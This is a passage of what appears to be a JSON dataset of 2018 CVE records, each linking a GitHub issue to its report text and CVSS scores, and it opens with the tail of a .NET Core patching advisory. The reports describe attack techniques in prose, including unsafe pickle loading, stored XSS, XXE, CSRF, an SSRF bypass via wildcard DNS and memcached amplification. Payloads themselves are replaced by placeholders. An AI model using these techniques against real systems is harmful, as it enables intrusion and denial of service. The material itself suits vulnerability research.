example project file: CODETAG The example has a reference to a single package, as seen by the APITAG element. The name of the package is in the Include attribute. The package version number is in the Version attribute. The example shows a direct dependency on one of the vulnerable packages from the table above, APITAG version NUMBERTAG To update to the secure package, change the version number to the updated package version. In the example, this would be updating APITAG to NUMBERTAG and later. Save the csproj file. The updated and secure csproj look as follows: CODETAG If you're using Visual Studio and save your updated csproj file, Visual Studio will restore the new package version. You can see the restore results by opening the Output window APITAG and changing the Show output from drop down list to Package Manager . If you're not using Visual Studio, open a command line and change to your project directory. Execute the dotnet restore command to restore the new dependency version. After updating your direct dependencies Recompile your application. If after recompilation you see a Dependency conflict warning , you must update your other direct dependencies to a compatible version. For example if your project refers directly to APITAG with a version number of APITAG , when you update your APITAG package to NUMBERTAG compilation will throw: APITAG To fix this, edit the version for the expected package to be the version expected by updating your FILETAG in the same way that you used to update the vulnerable package versions. After you've addressed all of your direct dependencies, you must review your transitive dependencies. Reviewing transitive dependencies There are two ways to view transitive dependencies. You can either use Visual Studio\u2019s Solution Explorer, or you can review the FILETAG file. Using Visual Studio Solution Explorer To use Solution Explorer, open the project in Visual Studio NUMBERTAG and then press Ctrl+; to activate the search in Solution Explorer. Search for each of the vulnerable package names above and make a note of the version numbers of any results you find. For example, searching for APITAG in an example project that contains a package that takes a dependency on APITAG shows the following results in Visual Studio NUMBERTAG FILETAG The search results appear as a tree. In these results, you can see a reference to APITAG version NUMBERTAG is discovered. Under the Dependencies node is a APITAG node. Under the APITAG node is the list of packages you have directly taken a dependency on and their versions. In this example, the application takes a direct dependency on APITAG . APITAG in turn has leaf nodes that list its dependencies and their versions. In the example, the APITAG package takes a dependency on a version of APITAG , that in turn takes a dependency on a vulnerable version of APITAG . Manually reviewing FILETAG (VS NUMBERTAG Open the FILETAG file from your project\u2019s obj directory in your editor. We suggest you use an editor that understands JSON and allows you to collapse and expand nodes to review this file. Visual Studio and Visual Studio Code provide JSON friendly editing. Search the FILETAG file for each of the vulnerable packages, using the format APITAG for each of the package names from the preceding table. If you find the assembly name in your search: Examine the line on which they are found, the version number is after the APITAG . Compare to the vulnerable versions table above. For example, a search result that shows APITAG is a reference to NUMBERTAG of APITAG . If your FILETAG file includes references to any of the vulnerable packages shown above, then you need to fix the transitive dependencies. Overriding transitive dependencies If you have not found any reference to any vulnerable packages this means: None of your direct dependencies depend on any vulnerable packages, or You have already fixed the problem by updating the direct dependencies. If your transitive dependency review found references to any of the vulnerable packages you must add a direct dependency to the updated package to your csproj file to override the transitive dependency. Open APITAG in your editor. If you're using Visual Studio, right click the project and choose Edit APITAG from the content menu, where projectname is the name of your project. Look for APITAG nodes, for example: CODETAG For each of the vulnerable packages your search returned, you must add a direct dependency to the updated version by adding it to the csproj file. You do this by adding a new line to the dependencies section, referring the fixed version. For example, if your search showed a transitive reference to the vulnerable APITAG version NUMBERTAG you would add a reference to the fixed version, that is NUMBERTAG or later. CODETAG After you have added the direct dependency reference, save your csproj file. If you're using Visual Studio, save your updated csproj file and Visual Studio will restore the new package versions. You can see the restore results by opening the Output window APITAG and changing the Show output from drop down list to Package Manager . If you're not using Visual Studio, open a command line and change to your project directory. Execute the dotnet restore command to restore the new dependencies. Rebuilding your application Rebuild your application. Test and deploy. Other Information Reporting Security Issues If you have found a potential security issue in .NET Core, please email details to EMAILTAG . Reports may qualify for the .NET Core Bug Bounty. Details of the .NET Core Bug Bounty including terms and conditions are at URLTAG URLTAG . Support You can ask questions about this issue on APITAG in the .NET Core or ASP.NET Core organizations. These are located at URLTAG and URLTAG The Announcements repo for each product ( URLTAG and URLTAG will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the discussion issue. Disclaimer The information provided in this advisory is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Acknowledgements Mikhail Shcherbakov URLTAG External Links CVETAG CVETAG Revisions NUMBERTAG APITAG NUMBERTAG Advisory published. APITAG NUMBERTAG APITAG Updated NUMBERTAG",
  16298. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  16299. "severity": "HIGH",
  16300. "baseScore": 8.8,
  16301. "impactScore": 5.9,
  16302. "exploitabilityScore": 2.8
  16303. },
  16304. {
  16305. "CVE_ID": "CVE-2018-1000022",
  16306. "Issue_Url_old": "https://github.com/spesmilo/electrum/issues/3374",
  16307. "Issue_Url_new": "https://github.com/spesmilo/electrum/issues/3374",
  16308. "Repo_new": "spesmilo/electrum",
  16309. "Issue_Created_At": "2017-11-24T23:49:02Z",
  16310. "description": "Password protect the JSONRPC interface. The JSONRPC interface is currently completely unprotected, I believe it should be a priority to add at least some form of password protection. Scans for the JSONRPC interface of Ethereum wallets have already started: URLTAG",
  16311. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N",
  16312. "severity": "MEDIUM",
  16313. "baseScore": 5.3,
  16314. "impactScore": 3.6,
  16315. "exploitabilityScore": 1.6
  16316. },
  16317. {
  16318. "CVE_ID": "CVE-2018-1000023",
  16319. "Issue_Url_old": "https://github.com/bitpay/insight-api/issues/542",
  16320. "Issue_Url_new": "https://github.com/bitpay/insight-api/issues/542",
  16321. "Repo_new": "bitpay/insight-api",
  16322. "Issue_Created_At": "2018-01-12T01:23:21Z",
  16323. "description": "Security] Full Path Disclosure. Sending unexpected data to broadcast endpoint APITAG results in an error message which contains path of the node app. APITAG Path Disclosure Vulnerability URLTAG Example Code: ERRORTAG examples NUMBERTAG Trezor.io ( FILETAG APITAG ERRORTAG NUMBERTAG blockdozer.com APITAG ERRORTAG It seems that all other deployment of insight has this vulnerability.",
  16324. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  16325. "severity": "MEDIUM",
  16326. "baseScore": 5.3,
  16327. "impactScore": 1.4,
  16328. "exploitabilityScore": 3.9
  16329. },
  16330. {
  16331. "CVE_ID": "CVE-2018-1000047",
  16332. "Issue_Url_old": "https://github.com/nasa/Kodiak/issues/5",
  16333. "Issue_Url_new": "https://github.com/nasa/kodiak/issues/5",
  16334. "Repo_new": "nasa/kodiak",
  16335. "Issue_Created_At": "2016-12-01T00:03:54Z",
  16336. "description": "Remote code execution in Kodiak. Hi, Kodiak ERRORTAG I would like to report a remote code execution potential vulnerability in Singledop . Pickle module enables binary serialization and loading of Python datatypes and any user supplied sample file can lead to remote code execution on any researches machine processing a serialized file. APITAG Attack binary a valid dop file: ERRORTAG The pickle module is not intended to be secure against erroneous or maliciously constructed data. Never unpickle data received from an untrusted or unauthenticated source. Please let me know if you have any questions. You can also reach back to me at nitin. EMAILTAG rg Thanks",
  16337. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  16338. "severity": "HIGH",
  16339. "baseScore": 8.8,
  16340. "impactScore": 5.9,
  16341. "exploitabilityScore": 2.8
  16342. },
  16343. {
  16344. "CVE_ID": "CVE-2018-1000048",
  16345. "Issue_Url_old": "https://github.com/nasa/RtRetrievalFramework/issues/1",
  16346. "Issue_Url_new": "https://github.com/nasa/rtretrievalframework/issues/1",
  16347. "Repo_new": "nasa/rtretrievalframework",
  16348. "Issue_Created_At": "2016-11-30T23:59:46Z",
  16349. "description": "Remote code execution APITAG Hi, APITAG CODETAG I would like to report a remote code execution potential vulnerability in Singledop . Pickle module enables binary serialization and loading of Python datatypes and any user supplied sample file can lead to remote code execution on any researches machine processing a serialized file. APITAG Attack binary a valid dop file: ERRORTAG The pickle module is not intended to be secure against erroneous or maliciously constructed data. Never unpickle data received from an untrusted or unauthenticated source. Please let me know if you have any questions. You can also reach back to me at nitin. EMAILTAG rg Thanks",
  16350. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  16351. "severity": "HIGH",
  16352. "baseScore": 8.8,
  16353. "impactScore": 5.9,
  16354. "exploitabilityScore": 2.8
  16355. },
  16356. {
  16357. "CVE_ID": "CVE-2018-1000052",
  16358. "Issue_Url_old": "https://github.com/fmtlib/fmt/issues/642",
  16359. "Issue_Url_new": "https://github.com/fmtlib/fmt/issues/642",
  16360. "Repo_new": "fmtlib/fmt",
  16361. "Issue_Created_At": "2018-02-01T16:37:50Z",
  16362. "description": "Segmentation fault in APITAG (memory corruption, invalid write of size NUMBERTAG Dear fmtlib team \u2014 I have detected a segmentation fault in APITAG function using an invalid format specifier. Version APITAG How to reproduce NUMBERTAG Use the following sample program APITAG ERRORTAG NUMBERTAG Compile bug.cc APITAG NUMBERTAG Execute APITAG gdb CODETAG valgrind ERRORTAG Expected behaviour Throw ERRORTAG exception I found the issue with AFL. Cheers Stephan Zeisberg",
  16363. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  16364. "severity": "HIGH",
  16365. "baseScore": 7.5,
  16366. "impactScore": 3.6,
  16367. "exploitabilityScore": 3.9
  16368. },
  16369. {
  16370. "CVE_ID": "CVE-2018-1000059",
  16371. "Issue_Url_old": "https://github.com/validformbuilder/validformbuilder/issues/126",
  16372. "Issue_Url_new": "https://github.com/validformbuilder/validformbuilder/issues/126",
  16373. "Repo_new": "validformbuilder/validformbuilder",
  16374. "Issue_Created_At": "2018-02-03T23:36:00Z",
  16375. "description": "PHP Object Injection Security Issue. Expected behavior When some form data provided by the web application client for unserialize, PHP Object serialization should only be valid for APITAG objects (or whatever they should be) Actual behavior User can enter any PHP Object. This can lead to vulnerabilities like remote code execution and local file inclusion. URLTAG This method requires an object to be provided with base NUMBERTAG encoding and gunzip. If we input a serialised PHP object with gunzipped and then base NUMBERTAG encoded, the vulnerability will trigger. I am yet to sift through all the code in the project to find an appropriate class to leverage. Which version/branch of APITAG Builder do you use? I use version/branch NUMBERTAG",
  16376. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  16377. "severity": "CRITICAL",
  16378. "baseScore": 9.8,
  16379. "impactScore": 5.9,
  16380. "exploitabilityScore": 3.9
  16381. },
  16382. {
  16383. "CVE_ID": "CVE-2018-1000060",
  16384. "Issue_Url_old": "https://github.com/sensu/sensu/issues/1804",
  16385. "Issue_Url_new": "https://github.com/sensu/sensu/issues/1804",
  16386. "Repo_new": "sensu/sensu",
  16387. "Issue_Created_At": "2018-01-20T11:11:34Z",
  16388. "description": "Visible password at sensu client logs after restart. Configuring single rabbitmq, sensu is able to redact the password in client logs after restart. But when configuring multiple rabbitmqs, plain text password is visible. Logs for single rabbitmq config : CODETAG Logs for multiple rabbitmq config : CODETAG This issue seems to occur because multilpe rabbitmq config is stored in a nested array format. Sensu is not able to look up the password keyword inside the hash, inside the array and hence, not able to redact the password in logs.",
  16389. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  16390. "severity": "CRITICAL",
  16391. "baseScore": 9.8,
  16392. "impactScore": 5.9,
  16393. "exploitabilityScore": 3.9
  16394. },
  16395. {
  16396. "CVE_ID": "CVE-2018-1000062",
  16397. "Issue_Url_old": "https://github.com/robiso/wondercms/issues/56",
  16398. "Issue_Url_new": "https://github.com/wondercms/wondercms/issues/56",
  16399. "Repo_new": "wondercms/wondercms",
  16400. "Issue_Created_At": "2018-02-08T10:26:37Z",
  16401. "description": "Stored Cross Site Scripting On File Upload . Hi Team, I have found stored Cross Site scripting on APITAG NUMBERTAG In FILETAG there is a function APITAG It does not sanitize svg file and it is possible to execute a Cross Site Scripting XSS attacks. Already sent email to EMAILTAG , and work with all modern browser. hope you can fix it asap. FILETAG When you fix the bug, please, can you include my name in the release notes when the bug will be corrected? Tanmay EMAILTAG",
  16402. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:L/UI:R/S:C/C:L/I:L/A:N",
  16403. "severity": "MEDIUM",
  16404. "baseScore": 4.4,
  16405. "impactScore": 2.7,
  16406. "exploitabilityScore": 1.3
  16407. },
  16408. {
  16409. "CVE_ID": "CVE-2018-1000071",
  16410. "Issue_Url_old": "https://github.com/roundcube/roundcubemail/issues/6173",
  16411. "Issue_Url_new": "https://github.com/roundcube/roundcubemail/issues/6173",
  16412. "Repo_new": "roundcube/roundcubemail",
  16413. "Issue_Created_At": "2018-02-12T12:26:39Z",
  16414. "description": "Permissions Issue with enigma plugin?. See my reference here. FILETAG",
  16415. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  16416. "severity": "HIGH",
  16417. "baseScore": 7.5,
  16418. "impactScore": 3.6,
  16419. "exploitabilityScore": 3.9
  16420. },
  16421. {
  16422. "CVE_ID": "CVE-2018-1000084",
  16423. "Issue_Url_old": "https://github.com/wolfcms/wolfcms/issues/667",
  16424. "Issue_Url_new": "https://github.com/wolfcms/wolfcms/issues/667",
  16425. "Repo_new": "wolfcms/wolfcms",
  16426. "Issue_Created_At": "2018-02-11T19:05:31Z",
  16427. "description": "Stored Cross Site Scripting Vulnerability APITAG Bug). Hi Team, I have found stored cross site scripting on APITAG NUMBERTAG Stable Version APITAG Bug) with privilege escalation. scenario APITAG to reproduce) Step NUMBERTAG Logged In as a Developer Role Step NUMBERTAG From Layout Tab edit the file Layout file name with APITAG APITAG Step NUMBERTAG It will store the name as javascript code and it will execute cross site scripting Step NUMBERTAG Logged in as a Admin and it will automatically execute the cross site scripting which were stored in Developers role layout. Step NUMBERTAG From Admin Role goto Layout Tab it will execute the cross site scripting. Vulnerable field is from APITAG tab APITAG Name\" APITAG find attached screenshot) FILETAG Developer stored javascript code which will execute on Admin page (screenshot) FILETAG Admin Page Cross Site scripting executed in screenshot It does not sanitize APITAG Name\" from APITAG Tab and it is possible to execute a Stored Cross Site Scripting XSS attacks from Devleoper role to Admin role Additional information Wolf CMS version NUMBERTAG DB type and version: APITAG NUMBERTAG APITAG HTTP server type and version: APITAG When you fix the bug, please, can you include my name in the release notes when the bug will be corrected? Tanmay EMAILTAG",
  16428. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  16429. "severity": "MEDIUM",
  16430. "baseScore": 5.4,
  16431. "impactScore": 2.7,
  16432. "exploitabilityScore": 2.3
  16433. },
  16434. {
  16435. "CVE_ID": "CVE-2018-1000086",
  16436. "Issue_Url_old": "https://github.com/nprapps/pym.js/issues/170",
  16437. "Issue_Url_new": "https://github.com/nprapps/pym.js/issues/170",
  16438. "Repo_new": "nprapps/pym.js",
  16439. "Issue_Created_At": "2018-02-13T19:28:00Z",
  16440. "description": "Sanitize url.",
  16441. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  16442. "severity": "HIGH",
  16443. "baseScore": 8.8,
  16444. "impactScore": 5.9,
  16445. "exploitabilityScore": 2.8
  16446. },
  16447. {
  16448. "CVE_ID": "CVE-2018-1000087",
  16449. "Issue_Url_old": "https://github.com/wolfcms/wolfcms/issues/666",
  16450. "Issue_Url_new": "https://github.com/wolfcms/wolfcms/issues/666",
  16451. "Repo_new": "wolfcms/wolfcms",
  16452. "Issue_Created_At": "2018-02-11T18:40:07Z",
  16453. "description": "Reflected Cross Site Scripting NUMBERTAG Hi Team, I have found Reflected Cross Site Scripting on APITAG NUMBERTAG Stable Version Vulnerable parameter is APITAG New File\" and APITAG New Directory\" It does not sanitize APITAG New File\" and APITAG New Directory\" input box from 'files' Tab and it is possible to execute a Cross Site Scripting XSS attacks. Please find the attached screenshot for proof of concept FILETAG Additional information Wolf CMS version NUMBERTAG DB type and version: APITAG NUMBERTAG APITAG HTTP server type and version: APITAG When you fix the bug, please, can you include my name in the release notes when the bug will be corrected? Tanmay EMAILTAG",
  16454. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  16455. "severity": "MEDIUM",
  16456. "baseScore": 4.8,
  16457. "impactScore": 2.7,
  16458. "exploitabilityScore": 1.7
  16459. },
  16460. {
  16461. "CVE_ID": "CVE-2018-1000088",
  16462. "Issue_Url_old": "https://github.com/doorkeeper-gem/doorkeeper/issues/969",
  16463. "Issue_Url_new": "https://github.com/doorkeeper-gem/doorkeeper/issues/969",
  16464. "Repo_new": "doorkeeper-gem/doorkeeper",
  16465. "Issue_Created_At": "2017-05-25T21:14:32Z",
  16466. "description": "XSS in default authorization page. Default authorization page use the \"raw\" fonction which inevitably lead to xss issue : URLTAG I will follow with a merge request",
  16467. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  16468. "severity": "MEDIUM",
  16469. "baseScore": 6.1,
  16470. "impactScore": 2.7,
  16471. "exploitabilityScore": 2.8
  16472. },
  16473. {
  16474. "CVE_ID": "CVE-2018-1000090",
  16475. "Issue_Url_old": "https://github.com/textpattern/textpattern/issues/1141",
  16476. "Issue_Url_new": "https://github.com/textpattern/textpattern/issues/1141",
  16477. "Repo_new": "textpattern/textpattern",
  16478. "Issue_Created_At": "2018-02-04T01:01:27Z",
  16479. "description": "XML Injection Denial of Service. Expected behaviour Validate XML import against a schema Actual behaviour Processes the XML bomb provided Steps to reproduce Import an XML file with the following content: CODETAG This shows how we can make the server consume memory when parsing the XML. This can be done to eventually exhaust the entire server's memory (depending on configuration) and create a denial of service scenario. The lines of code vulnerable are given below: URLTAG If schema validation is added to the method, the issue should be resolved. This will also require ensuring entities are not within the XML file too.",
  16480. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  16481. "severity": "HIGH",
  16482. "baseScore": 7.5,
  16483. "impactScore": 3.6,
  16484. "exploitabilityScore": 3.9
  16485. },
  16486. {
  16487. "CVE_ID": "CVE-2018-1000091",
  16488. "Issue_Url_old": "https://github.com/mwarning/KadNode/issues/79",
  16489. "Issue_Url_new": "https://github.com/mwarning/kadnode/issues/79",
  16490. "Repo_new": "mwarning/kadnode",
  16491. "Issue_Created_At": "2018-02-15T08:21:47Z",
  16492. "description": "Buffer Overflow Vulnerability in ext cmd.c. The Issue A user can overflow the buffer for APITAG and can control EIP using this. This implies the user can control the execution flow of the program. Proof of Concept Run the following command: APITAG This will trigger a SIGSEGV and provide the output APITAG FILETAG The line where this issue occurs is as follows: URLTAG",
  16493. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  16494. "severity": "HIGH",
  16495. "baseScore": 8.8,
  16496. "impactScore": 5.9,
  16497. "exploitabilityScore": 2.8
  16498. },
  16499. {
  16500. "CVE_ID": "CVE-2018-1000093",
  16501. "Issue_Url_old": "https://github.com/cryptonotefoundation/cryptonote/issues/172",
  16502. "Issue_Url_new": "https://github.com/cryptonotefoundation/cryptonote/issues/172",
  16503. "Repo_new": "cryptonotefoundation/cryptonote",
  16504. "Issue_Created_At": "2018-02-05T08:10:40Z",
  16505. "description": "Vulnerability report. Hi, I found a vulnerability in APITAG Please send me an email at terrycwk NUMBERTAG at] APITAG as well as respond to this issue so that I know the email is from a legitimate developer.",
  16506. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  16507. "severity": "HIGH",
  16508. "baseScore": 8.8,
  16509. "impactScore": 5.9,
  16510. "exploitabilityScore": 2.8
  16511. },
  16512. {
  16513. "CVE_ID": "CVE-2018-1000093",
  16514. "Issue_Url_old": "https://github.com/amjuarez/bytecoin/issues/217",
  16515. "Issue_Url_new": "https://github.com/amjuarez/bytecoin/issues/217",
  16516. "Repo_new": "amjuarez/bytecoin",
  16517. "Issue_Created_At": "2018-02-05T08:10:38Z",
  16518. "description": "Vulnerability report. Hi, I found a vulnerability in Bytecoin. Please send me an email at terrycwk NUMBERTAG at] APITAG as well as respond to this issue so that I know the email is from a legitimate developer.",
  16519. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  16520. "severity": "HIGH",
  16521. "baseScore": 8.8,
  16522. "impactScore": 5.9,
  16523. "exploitabilityScore": 2.8
  16524. },
  16525. {
  16526. "CVE_ID": "CVE-2018-1000100",
  16527. "Issue_Url_old": "https://github.com/gpac/gpac/issues/994",
  16528. "Issue_Url_new": "https://github.com/gpac/gpac/issues/994",
  16529. "Repo_new": "gpac/gpac",
  16530. "Issue_Created_At": "2018-02-22T07:51:17Z",
  16531. "description": "Out of bounds heap write . Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! [x] I looked for a similar issue and couldn't find any. [x] I tried with the latest version of GPAC. Installers available at URLTAG [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command line ...). I can share files anonymously with this dropbox: URLTAG Detailed guidelines: URLTAG There is an out of bounds heap write in av_ext.c: URLTAG APITAG is read from user input, and then used in the condition of the for loop. This means the user can force the loop to execute up to NUMBERTAG times. The APITAG array only has NUMBERTAG elements, and this array is allocated on the heap, so I can craft a file that causes this file to write out of the bounds of the array onto the heap. For example, an attacker could overwrite the top chunk of the glibc heap, which can be used with other bugs to achieve remote code execution in services processing user supplied media files.",
  16532. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  16533. "severity": "HIGH",
  16534. "baseScore": 7.8,
  16535. "impactScore": 5.9,
  16536. "exploitabilityScore": 1.8
  16537. },
  16538. {
  16539. "CVE_ID": "CVE-2018-1000115",
  16540. "Issue_Url_old": "https://github.com/memcached/memcached/issues/348",
  16541. "Issue_Url_new": "https://github.com/memcached/memcached/issues/348",
  16542. "Repo_new": "memcached/memcached",
  16543. "Issue_Created_At": "2018-02-27T23:57:02Z",
  16544. "description": "UDP Amplification Attacks, result of Memcached UDP port NUMBERTAG URLTAG The above commit has resulted in the ability to spoof a victim address to public memcache servers around the world, resulting in a massive amount of data returned from the memcache service. Simple example: FILETAG These attacks appear to be ranging anywhere from APITAG to over APITAG This has been confirmed on the backlines by many providers, as well as publicly by Cloudflare, and Rapid7. URLTAG URLTAG",
  16545. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  16546. "severity": "HIGH",
  16547. "baseScore": 7.5,
  16548. "impactScore": 3.6,
  16549. "exploitabilityScore": 3.9
  16550. },
  16551. {
  16552. "CVE_ID": "CVE-2018-1000124",
  16553. "Issue_Url_old": "https://github.com/mkucej/i-librarian/issues/116",
  16554. "Issue_Url_new": "https://github.com/mkucej/i-librarian/issues/116",
  16555. "Repo_new": "mkucej/i-librarian",
  16556. "Issue_Created_At": "2018-03-02T14:54:34Z",
  16557. "description": "XXE vulnerability. URLTAG URLTAG APITAG passes into APITAG , APITAG passes into APITAG This creates a Blind XXE URLTAG vulnerability. By XXE, an attacker can read the contents of a file on the target host and attack other hosts on the intranet(SSRF). POC: CODETAG APITAG",
  16558. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
  16559. "severity": "CRITICAL",
  16560. "baseScore": 10.0,
  16561. "impactScore": 6.0,
  16562. "exploitabilityScore": 3.9
  16563. },
  16564. {
  16565. "CVE_ID": "CVE-2018-1000125",
  16566. "Issue_Url_old": "https://github.com/inversoft/prime-jwt/issues/2",
  16567. "Issue_Url_new": "https://github.com/fusionauth/fusionauth-jwt/issues/2",
  16568. "Repo_new": "fusionauth/fusionauth-jwt",
  16569. "Issue_Created_At": "2018-01-30T10:17:47Z",
  16570. "description": "The library does not check the situation if signature algorithm is defined but no signature is provided. Please doublecheck this is a valid issue. According to FILETAG \"alg\" Header Parameter MUST be present and MUST be understood and processed by implementations. In my opinion that means that if \"alg\" is not \"none\", then signature must be present and verified. Attached FILETAG demonstrates the problem.",
  16571. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  16572. "severity": "CRITICAL",
  16573. "baseScore": 9.8,
  16574. "impactScore": 5.9,
  16575. "exploitabilityScore": 3.9
  16576. },
  16577. {
  16578. "CVE_ID": "CVE-2018-1000127",
  16579. "Issue_Url_old": "https://github.com/memcached/memcached/issues/271",
  16580. "Issue_Url_new": "https://github.com/memcached/memcached/issues/271",
  16581. "Repo_new": "memcached/memcached",
  16582. "Issue_Created_At": "2017-04-28T01:54:33Z",
  16583. "description": "Memcached gets a dead loop in func assoc_find. OS Ver: APITAG NUMBERTAG Kernel Ver NUMBERTAG APITAG Memcached Ver NUMBERTAG and NUMBERTAG gdb info: (gdb) info thread NUMBERTAG Thread NUMBERTAG f NUMBERTAG e NUMBERTAG LWP NUMBERTAG logger_thread (arg=<value optimized out>) at APITAG NUMBERTAG Thread NUMBERTAG f NUMBERTAG d NUMBERTAG LWP NUMBERTAG assoc_find (key=<value optimized out>, nkey=<value optimized out>, hv=<value optimized out>) at APITAG NUMBERTAG Thread NUMBERTAG f NUMBERTAG cf NUMBERTAG LWP NUMBERTAG f NUMBERTAG e NUMBERTAG a NUMBERTAG in __lll_lock_wait () from APITAG NUMBERTAG Thread NUMBERTAG f NUMBERTAG LWP NUMBERTAG f NUMBERTAG e NUMBERTAG a NUMBERTAG in __lll_lock_wait () from APITAG NUMBERTAG Thread NUMBERTAG f NUMBERTAG fff NUMBERTAG LWP NUMBERTAG f NUMBERTAG e NUMBERTAG a NUMBERTAG in __lll_lock_wait () from APITAG NUMBERTAG Thread NUMBERTAG f NUMBERTAG fe NUMBERTAG LWP NUMBERTAG f NUMBERTAG e NUMBERTAG c in APITAG () from APITAG NUMBERTAG Thread NUMBERTAG f NUMBERTAG f1aa NUMBERTAG LWP NUMBERTAG f NUMBERTAG e NUMBERTAG f NUMBERTAG in epoll_wait () from APITAG In the thread NUMBERTAG assoc_find): dead loop in: (gdb) n NUMBERTAG while (it) { (gdb NUMBERTAG if ((nkey == it >nkey) && (memcmp(key, ITEM_key(it), nkey NUMBERTAG gdb NUMBERTAG it = it >h_next; items info: (gdb) p it NUMBERTAG item NUMBERTAG f NUMBERTAG a4fd7a0 (gdb) p it NUMBERTAG next NUMBERTAG f NUMBERTAG a4fd7a0, pre NUMBERTAG f0ffaeee NUMBERTAG h_next NUMBERTAG f NUMBERTAG a4fd7a0, time NUMBERTAG exptime NUMBERTAG nbytes NUMBERTAG refcount NUMBERTAG nsuffi NUMBERTAG n', it_flags NUMBERTAG slabs_clsid NUMBERTAG nkey NUMBERTAG data NUMBERTAG f NUMBERTAG a4fd7a0} it >h_next == it self, so the deap loop coming.. So this is a bug ?",
  16584. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  16585. "severity": "HIGH",
  16586. "baseScore": 7.5,
  16587. "impactScore": 3.6,
  16588. "exploitabilityScore": 3.9
  16589. },
  16590. {
  16591. "CVE_ID": "CVE-2018-1000133",
  16592. "Issue_Url_old": "https://github.com/tridentli/pitchfork/issues/168",
  16593. "Issue_Url_new": "https://github.com/tridentli/pitchfork/issues/168",
  16594. "Repo_new": "tridentli/pitchfork",
  16595. "Issue_Created_At": "2018-03-07T03:44:31Z",
  16596. "description": "Resolve Perms isssue for Thomas. There's an issue with the way perms are mapped, see bapril for details.",
  16597. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
  16598. "severity": "HIGH",
  16599. "baseScore": 7.5,
  16600. "impactScore": 5.9,
  16601. "exploitabilityScore": 1.6
  16602. },
  16603. {
  16604. "CVE_ID": "CVE-2018-1000134",
  16605. "Issue_Url_old": "https://github.com/pingidentity/ldapsdk/issues/40",
  16606. "Issue_Url_new": "https://github.com/pingidentity/ldapsdk/issues/40",
  16607. "Repo_new": "pingidentity/ldapsdk",
  16608. "Issue_Created_At": "2018-03-09T14:04:27Z",
  16609. "description": "APITAG in APITAG allows empty password with set APITAG Hey folks, Is there a reason why check for empty password when APITAG is set comes after logic for doing processing in synchronous mode? URLTAG ERRORTAG At the moment that check only applies to async mode and leaves synchronous mode open to the old and nasty behaviour. Could that entire block be moved up to cover both sync and async methods?",
  16610. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  16611. "severity": "CRITICAL",
  16612. "baseScore": 9.8,
  16613. "impactScore": 5.9,
  16614. "exploitabilityScore": 3.9
  16615. },
  16616. {
  16617. "CVE_ID": "CVE-2018-1000137",
  16618. "Issue_Url_old": "https://github.com/mkucej/i-librarian/issues/121",
  16619. "Issue_Url_new": "https://github.com/mkucej/i-librarian/issues/121",
  16620. "Repo_new": "mkucej/i-librarian",
  16621. "Issue_Created_At": "2018-03-15T12:39:42Z",
  16622. "description": "CSRF to force new password for administrator. URLTAG CSRF URLTAG vulnerability is present here, It will allow an attacker to force updates the password of the admin whose id is NUMBERTAG POC: CODETAG",
  16623. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  16624. "severity": "HIGH",
  16625. "baseScore": 8.8,
  16626. "impactScore": 5.9,
  16627. "exploitabilityScore": 2.8
  16628. },
  16629. {
  16630. "CVE_ID": "CVE-2018-1000138",
  16631. "Issue_Url_old": "https://github.com/mkucej/i-librarian/issues/120",
  16632. "Issue_Url_new": "https://github.com/mkucej/i-librarian/issues/120",
  16633. "Repo_new": "mkucej/i-librarian",
  16634. "Issue_Created_At": "2018-03-15T10:01:18Z",
  16635. "description": "SSRF vulnerability. URLTAG The filter can be bypassed by wildcard DNS. e.g. xip.io POC: CODETAG APITAG",
